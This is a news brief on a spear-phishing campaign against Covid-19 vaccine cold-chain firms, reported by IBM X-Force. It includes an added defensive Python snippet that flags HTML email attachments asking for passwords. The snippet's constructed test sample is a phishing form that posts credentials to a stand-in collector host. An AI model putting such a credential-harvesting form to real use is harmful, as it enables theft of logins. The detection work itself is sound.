In brief: Hackers are targeting organizations that ensure coronavirus vaccines are safely transported and stored in temperature-controlled environments, a process known as the Covid-19 cold chain. The attacks consist of a phishing campaign that has spanned six countries, and while the group responsible has not been identified, previous similar incidents have been linked to the Chinese, Russian, Iranian, and North Korean governments.
The revelation comes from the IBM Security X-Force team, which writes that while firm attribution could not be established for the campaign, it bears all the “potential hallmarks of nation-state tradecraft.”
The spear-phishing emails are disguised using the name of a business executive from Haier Biomedical, a Chinese company that is part of the UN’s official Cold Chain Equipment Optimization Platform (CCEOP) program.
The emails were sent to “executives in sales, procurement, information technology and finance positions, likely involved in company efforts to support a vaccine cold chain.” They appear to request quotations for the CCEOP program but actually contain malicious HTML attachments that victims need to download and open locally.
This method removes the need to set up an online phishing page that could be identified and taken down by security researchers. Once the recipients enter their credentials, attackers can potentially access companies’ internal networks, allowing them to learn the process, methods, and plans for distributing a Covid-19 vaccine.
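Because the lure arrives as a local HTML file rather than a link, mail-side inspection of attachments is where a defender can catch it. The following is an added example, not taken from the IBM report: it flags HTML attachments that contain a password field and lists the remote hosts their forms post to. The sample message, file name and `collector.example.invalid` host are constructed for illustration.

```python
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormScan(HTMLParser):
    """Record every form action and whether a password input is present."""
    def __init__(self):
        super().__init__()
        self.actions, self.has_password = [], False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password = True


def scan_message(msg):
    """Return one finding per HTML attachment that asks for a password."""
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        # Match on MIME type or extension: senders can mislabel either one.
        if part.get_content_type() != "text/html" and not name.lower().endswith((".htm", ".html")):
            continue
        raw = part.get_payload(decode=True) or b""
        scan = FormScan()
        scan.feed(raw.decode(part.get_content_charset() or "utf-8", errors="replace"))
        if scan.has_password:
            urls = [urlparse(u) for u in scan.actions]
            hosts = sorted({u.hostname for u in urls if u.scheme in ("http", "https") and u.hostname})
            findings.append({"attachment": name, "remote_hosts": hosts})
    return findings


def build_sample(with_password=True):
    """Constructed sample: a quotation request carrying an HTML attachment."""
    field = '<input type="password" name="p">' if with_password else ""
    html = ('<html><body><form action="https://collector.example.invalid/submit" '
            f'method="post"><input name="u">{field}</form></body></html>')
    msg = EmailMessage()
    msg["Subject"] = "Request for quotation (constructed sample)"
    msg.set_content("Please see the attached quotation request.")
    msg.add_attachment(html, subtype="html", filename="quotation.html")
    return msg


if __name__ == "__main__":
    print(scan_message(build_sample()))
```

A finding is a triage signal, not a verdict; forms that build their destination in script would need the attachment opened in a sandbox to resolve.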
“As governments are preparing to roll out vaccines, criminal organizations are planning to infiltrate or disrupt supply chains.” - Jürgen Stock, INTERPOL Secretary General
Yesterday saw the UK become the first country in the world to approve the Pfizer/BioNTech vaccine, which has to be kept at a temperature of about -70C (-94F). AstraZeneca’s vaccine, meanwhile, requires a less demanding 36 degrees to 46 degrees Fahrenheit.
As reported by ZDNet, the US Federal Bureau of Investigation and the Cybersecurity and Infrastructure Security Agency have released a security alert about the phishing campaign, while Interpol has warned of an organized crime threat to Covid-19 vaccines.
Image credit: ungvar